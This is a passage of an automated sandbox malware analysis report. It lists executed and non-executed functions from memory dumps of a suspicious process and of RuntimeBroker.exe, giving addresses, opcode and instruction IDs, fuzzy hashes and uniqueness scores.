Opcode Fuzzy Hash: a1d5aff5078ab4e24d7b850a4a79cd1a6ae58ff0b51c818b1f0ca60743cb8a81
Instruction Fuzzy Hash: 9F317830D1D64E8EEB55EB68C8586FEB6F0EF05340F40047AD449E21D2EB38AA04CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F132F5 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efd1f84d4cfde76ad1532ea22808fd22754c28fd4018499a635006a80058be05
Instruction ID: 4030329dbeac81ceb781884ecf03c05e59fdc4248d0cb1b8b3d88081abf976b0
Opcode Fuzzy Hash: efd1f84d4cfde76ad1532ea22808fd22754c28fd4018499a635006a80058be05
Instruction Fuzzy Hash: 7E21C371D0851D8FEB98EB98C495AECBBF1FB58341F50416AD04AE72D2CB386981DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F11F39 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2212a0798ec64210e2039efb29d411875b16377b48d8ff24d2513e364d069905
Instruction ID: 4fdc3be69e9156103e66e1291e2ed04ff169788edcfbbaa02d670b2a8f24f63c
Opcode Fuzzy Hash: 2212a0798ec64210e2039efb29d411875b16377b48d8ff24d2513e364d069905
Instruction Fuzzy Hash: B8117C2181E2C28EEB63A77858655616F945F03364F2D56FBE0D8CA0E3DB0D5C89C307

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F104F8 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eb52c37d5a2009bae32c9967f9cafa42db2954521a3ec00b7afd39ff56e52a7
Instruction ID: 1b9e01942e0344db76ec585b8b20929bb3556ae7fc0350d767a26a07d471a383
Opcode Fuzzy Hash: 4eb52c37d5a2009bae32c9967f9cafa42db2954521a3ec00b7afd39ff56e52a7
Instruction Fuzzy Hash: 7C11903081D78E8FEB56EFB488582BA3BA0FF16341F4404BAE809C65D1EB38A854C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F126F8 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a8171e61ddf6d27cd658afd3682a64aec07ea9e3564a0065bb39cb5f1cd88bd
Instruction ID: b682af328f6469c8940b00825b29f7149de5bea6a9736e46462c67b33c3d4f37
Opcode Fuzzy Hash: 1a8171e61ddf6d27cd658afd3682a64aec07ea9e3564a0065bb39cb5f1cd88bd
Instruction Fuzzy Hash: D411543181D78E8FEB56EFA488582BA7BA0FF15341F4404BAD809C65D1EB38E954C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F105D8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c1b229d6db466a5608ded5d2209987fe3d7a0d8614c78e2673148ba634628f
Instruction ID: 4d55ef856494afffec716fb2ae6d76808f17b1525f0a3edbf9b648d9f8eda4b3
Opcode Fuzzy Hash: 43c1b229d6db466a5608ded5d2209987fe3d7a0d8614c78e2673148ba634628f
Instruction Fuzzy Hash: 5711CE3080D64E8FDB89EF2484596FA7BA1FF59345F1054BED409C31D2DB36A895CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9db48d3922d90802a777fe2b2af427cc601674b679e2b915bdcb2f03d95c3304
Instruction ID: 682ff6b7012abdfdfd6709ff3f09070158d29f461978c7f72ad0fdebcd3d0cae
Opcode Fuzzy Hash: 9db48d3922d90802a777fe2b2af427cc601674b679e2b915bdcb2f03d95c3304
Instruction Fuzzy Hash: 2901693091860E9EEB59FBA484686BE76A1FF18345F50087EE40EC25D1DF35A990C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c792a09dc71c154cde94d621c152e5a67196647adc45d30af17f7a91b5ccc6cc
Instruction ID: 327cf9515e45d5f8b9f6d8ebd9bdcd2efff3287a904d1e3a45c9d03e92884cf9
Opcode Fuzzy Hash: c792a09dc71c154cde94d621c152e5a67196647adc45d30af17f7a91b5ccc6cc
Instruction Fuzzy Hash: 87016930918A0E9FEB59EBA484592BAB7E0FF18345F20087EE40EC21D1DF3AA950C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F127CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce39092d4eafbf28f44efc00247a0357ac751faccb16562771a15e5069fc0c4d
Instruction ID: c2a802ca4a76c8bb079f596f28f7caad315acf58caab4118b8df43fb7541799a
Opcode Fuzzy Hash: ce39092d4eafbf28f44efc00247a0357ac751faccb16562771a15e5069fc0c4d
Instruction Fuzzy Hash: 7CF0BE3080E78E8FEB59EFA488192B97BA0FF15351F4405BFE809C60D2EB399854C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F11710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction ID: 693f32c6156efbbeb888949efe4ae0d6f2166c4b5e3abdedecbf942bfa188b7c
Opcode Fuzzy Hash: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction Fuzzy Hash: BDE0ED30E2D9064EEA647318948567461D59F44394FB89675F01CCA1E7EB2DECC6D209

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F151AE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction ID: 7b90d23f94693b1f56b7d88455286942ddf29a1b27883871e7f1333bb1267cad
Opcode Fuzzy Hash: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction Fuzzy Hash: CCE09670D59E1D8EEBB5EB588C54BB9B6B1BB58742F5010EAC00DE2291DE346E809F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1B32B Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b62fb2d5ee852c85af3919a4a305743c2c9ab52e9259c112d028871c0259f4
Instruction ID: a8faaab668e84c048920598a78afcce8cca84767f0631327bd4e039fdcf1fb80
Opcode Fuzzy Hash: c6b62fb2d5ee852c85af3919a4a305743c2c9ab52e9259c112d028871c0259f4
Instruction Fuzzy Hash: 2ED05E30C1D54A9EDB91F710C851AEAB770EF25340F1442E2800DD2186CF38AEC08F44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10FA5 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dbccac3c380118a51f22998852fac74e695f0e6aa973513d7ee6e5d14aa19db
Instruction ID: e6b6d399a14a0c341d6dd775f90e5804d8b1044ff79da84519fa86fdef61bb5b
Opcode Fuzzy Hash: 4dbccac3c380118a51f22998852fac74e695f0e6aa973513d7ee6e5d14aa19db
Instruction Fuzzy Hash: 3EE0EC30D1A5299EE750FB14C810BAEBAB1FF44344F5001B5D00DA32C6DF386E408F54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F18EA7 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction ID: 4c369548c7cb7c212b746bae8d309d2ecf7a1807388be650cc210e98c9e3d292
Opcode Fuzzy Hash: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction Fuzzy Hash: C7D06C70A09A298EEBA4EB0488547AAB271FB48342F1005EB840DE72D1EE742E808F04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F1ACAD Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2203122138.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6dd68a48bfdd9c606e8d01248046c9cce77f9a11945ef1c21d24e10957eadd9
Instruction ID: f3f0d14ac4012fca38247ecff7557905e253dab333f7711a0007021b6fd7c9f8
Opcode Fuzzy Hash: c6dd68a48bfdd9c606e8d01248046c9cce77f9a11945ef1c21d24e10957eadd9
Instruction Fuzzy Hash: 6DB18B3190D64E8FEB98EF6494596FE7BE0FF99341F0004BAD809D7192DB39A944CB80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RuntimeBroker.exePID: 1084, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F2139C Relevance: 3.8, Strings: 3, Instructions: 76COMMON

Download Yara Rule

Strings

", xrefs: 00007FF848F21602
/, xrefs: 00007FF848F21870
., xrefs: 00007FF848F215CA

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: "$.$/
API String ID: 0-983106565
Opcode ID: 4b4e9784e2a989b949b159f12efcc76565d2edab401087f807cbf20e80bd0776
Instruction ID: a5d3b4d5be3983c36ca16b5558ce61f1f714088711142ac592619612ccd199f7
Opcode Fuzzy Hash: 4b4e9784e2a989b949b159f12efcc76565d2edab401087f807cbf20e80bd0776
Instruction Fuzzy Hash: 6231F234D086598EEBA8EF54C8987EDB3B1FF54341F1045AAC41EAA291CB796A84CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F12085 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848F1210B

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 2224f55a7da914b307e3f46628b0bdf94dc21af03b18823769a1f1fdb8092551
Instruction ID: 92485fd7138bc5c6de683f3800dc54676c531e697c48cb8cb2a1fda00c046b87
Opcode Fuzzy Hash: 2224f55a7da914b307e3f46628b0bdf94dc21af03b18823769a1f1fdb8092551
Instruction Fuzzy Hash: B8412231E0DA8A4FE745EBB898591B8BBE1EF86390F0501BAD40CC71D2DF28AC418355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F10A70

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: 2061f52735a3b48664809e3fbe5bfb6219ea303c798b9d5709a8287fe07b9674
Instruction ID: 402c8452937c697491eef4fc6a0a8d07a3fad52853a281d6065f3a2ebee193d2
Opcode Fuzzy Hash: 2061f52735a3b48664809e3fbe5bfb6219ea303c798b9d5709a8287fe07b9674
Instruction Fuzzy Hash: B9116A31D0CA5E9EE780FB68D8492B97BE0FFA8381F4405B6D809C6192EF38A9448700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1118D Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F111FD

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 0fa2f4adbb8a537515df78bee953e6fd7b5188cd621dac9930cc2556859b73a0
Instruction ID: bdce7e5af734168ff18abbb27052c61134d52812cc25b40025d8f573d69e4ef7
Opcode Fuzzy Hash: 0fa2f4adbb8a537515df78bee953e6fd7b5188cd621dac9930cc2556859b73a0
Instruction Fuzzy Hash: 7811C170D0D68A4FEB99EB6488693B9BBE0FF55341F5414BEC00AD61C2EF296980C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F111A0 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F111FD

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: dfda0d7ff6bfeb29d86f98c51ae90b7b4f77b9d7d7cc2d4aa64df26cba80199d
Instruction ID: f5c00f951515db8649f492adb3a13a779c9bef65981f6f5947d8429aca792c4c
Opcode Fuzzy Hash: dfda0d7ff6bfeb29d86f98c51ae90b7b4f77b9d7d7cc2d4aa64df26cba80199d
Instruction Fuzzy Hash: 5BF02870D1C54E4EFB94BB6488083F9B6E4FF51340F00143AD41DD20C1EF2419508604

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1D8D8 Relevance: .5, Instructions: 497COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f1d000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 192e590a588c115c138b4c45a88be196161e3e4966b5b1e40431c0f167e67f98
Instruction ID: 5b1216dfa5ef5e7462fe5f0be26458da0a1e0ae784efb98e3c3047d6d01cdcd1
Opcode Fuzzy Hash: 192e590a588c115c138b4c45a88be196161e3e4966b5b1e40431c0f167e67f98
Instruction Fuzzy Hash: 2D024931D19A5A8FEB98EB68C4A57B9B7B1FF59341F4401BAD00ED72D2CB386844CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F232E4 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb05a8d2bf1a254e9533677eb0ccaba3b1ba2c83e32038e99529463d28534f4
Instruction ID: e99acad9f62e6915cc38902d928f98e416cc6f5eac6695e3c2a69b1d1a124df6
Opcode Fuzzy Hash: 8bb05a8d2bf1a254e9533677eb0ccaba3b1ba2c83e32038e99529463d28534f4
Instruction Fuzzy Hash: EF018FB1D0E2CA8EE752A77C58662B97FB0EF03240F0804F6D08CC70E3DA1969088353

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2382F Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a7d6c8734375b07cc59657bece4e176d838d521b5c8429fc8001890e2b4d4f6
Instruction ID: 20e6924b4427608823289d34e440efaa62fbd3ff7cc51163cb05352ba2afcf84
Opcode Fuzzy Hash: 9a7d6c8734375b07cc59657bece4e176d838d521b5c8429fc8001890e2b4d4f6
Instruction Fuzzy Hash: A3913727B195359AD310BBBCF8552EABBA0FF853B6F04057BC289CD093DA186046C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F116A8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30ff62e2be6d74b34bf7dd2da5b442ecb17e9076cd87cc70b1dd2e9872858c07
Instruction ID: 7ec4b8b67ef6ff257ac389da51b76fceb5a685df4e8923f7719d1e40389c65d6
Opcode Fuzzy Hash: 30ff62e2be6d74b34bf7dd2da5b442ecb17e9076cd87cc70b1dd2e9872858c07
Instruction Fuzzy Hash: 0A91BC31A0CA8A8FDB59EF1898556B977E2FF99744F14057AE44DC32C2CE34AC82C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F22A87 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f529fa5848ff5177adbc60abb44bda959a1bbfad36c1f6e3ad0eaaf665c68da
Instruction ID: fbdefc723143f5041dcd6f0ee576b72cead537a00ab39af055d52c20a35bf443
Opcode Fuzzy Hash: 4f529fa5848ff5177adbc60abb44bda959a1bbfad36c1f6e3ad0eaaf665c68da
Instruction Fuzzy Hash: F891A270D186198EEBA4EB98D855BEDBBB1FF58340F1041AAD40DE3292DF3869858B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F135FE Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ec7a5d93bcee8ab5097303e993fa696c51d7dceec26200d0b715def11c1ed2
Instruction ID: fc9f17b867fe35c66c204cb113a11a273e5f59a154a647f73e9dc633a20faf9c
Opcode Fuzzy Hash: 08ec7a5d93bcee8ab5097303e993fa696c51d7dceec26200d0b715def11c1ed2
Instruction Fuzzy Hash: 30719A31E1C94A8FEB95EB6CD8257ADBBE1FB99350F50017AC00DD32C6DFA828058B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F11C6D Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d60520c0f6d0b182a08de0140da2eeb9c9c5136e8c351f26309ed983f96c2f61
Instruction ID: 5a13bb5cc78eaf9ea14e829af149a437ffafe2ad2a09dce6d2d3d07a3530501b
Opcode Fuzzy Hash: d60520c0f6d0b182a08de0140da2eeb9c9c5136e8c351f26309ed983f96c2f61
Instruction Fuzzy Hash: AF51AE31A1CA9A8FDB48EF1888545BA77E2FB98754F14057ED44AC32C2CF34AC42C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F131C1 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d7ab32ca6cd2bc3ca78f0820c820525f05d84df96d04e51e84aa7a8b78bf8e
Instruction ID: 7820f227d455c6f067166b4391c139e0cc62a465c3eb804db45438d9d6e70fd9
Opcode Fuzzy Hash: e1d7ab32ca6cd2bc3ca78f0820c820525f05d84df96d04e51e84aa7a8b78bf8e
Instruction Fuzzy Hash: D151F370D0C65D8EEB94EBA8D4986EDBBF1EF58340F50407AD049E72D2DB386945CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F228DC Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f5c54998308d06e5153a63f13f0ee2c6054e2255a4a4500cd55b2a24c46adb2
Instruction ID: 4f640dc23968d2100d70f1729f35e3bd4f83769fbf23ff1a6896a6b3f73b76d6
Opcode Fuzzy Hash: 1f5c54998308d06e5153a63f13f0ee2c6054e2255a4a4500cd55b2a24c46adb2
Instruction Fuzzy Hash: FC41A070D186198FEBA4EB68D895BA8BBB1FF59340F5041AAD40DE3292DF346984DB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2267D Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a3b53067f70268438d7e734eaaac36716b6eff792c28bbc47d5e3f5be6d763
Instruction ID: 22eb03572692b1d4b5d334207e3dc867d775fb78f7f28ea6fc73a272539d219d
Opcode Fuzzy Hash: 17a3b53067f70268438d7e734eaaac36716b6eff792c28bbc47d5e3f5be6d763
Instruction Fuzzy Hash: 99412830E2965D9FEB44EBA8D855AEEBBB1FF58301F100579E009E3292DF3968418B51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1AE88 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f1a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c4b3bddb2e850d0b5e0129177abc35db47a79fad1ecad5a0aa3c81108960f14
Instruction ID: 6c2fbac7f665fad3b195855671c3b37f0b52a5e2e58c90dab1d84af884020d87
Opcode Fuzzy Hash: 5c4b3bddb2e850d0b5e0129177abc35db47a79fad1ecad5a0aa3c81108960f14
Instruction Fuzzy Hash: EA31DE72D1D68A8FE702EB7888191F97BE0FF15380F0806BAC45DC71D2EF28A9948355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1BD69 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f1a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19afdd6523068ed0839f4661df57529114f427c283264bf9bc83d48965e7d7af
Instruction ID: 6b5c494d5f8823ee9872e07243c164c9388af1a370799d5a2b7c88fca9fd1d2d
Opcode Fuzzy Hash: 19afdd6523068ed0839f4661df57529114f427c283264bf9bc83d48965e7d7af
Instruction Fuzzy Hash: A331447091D6498FDB59EFA4C8946EDBBF1EF19310F18017AD009E7291DB38AD408B98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F239D3 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3fcc62376b35756a1df563f134d047a41fdc5678d05d8a7b1b14569a51d7fad
Instruction ID: f11bbb468d82797f998100d40c5e6473ff784203faf13bebac6daad2854d84a3
Opcode Fuzzy Hash: e3fcc62376b35756a1df563f134d047a41fdc5678d05d8a7b1b14569a51d7fad
Instruction Fuzzy Hash: 3E212C77F0D5968FE711BB6CBC552F5BFA0FF427A5F0400B7C648CA092DA2950048756

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F132F5 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62fd51ab0b8b1ab755241776db875449f73a5333c13350c53f94f13ffd463111
Instruction ID: 458e81228b886592b5bd3f3aa0e1ed04ca9cb1f60043de45e5c749be9e46898d
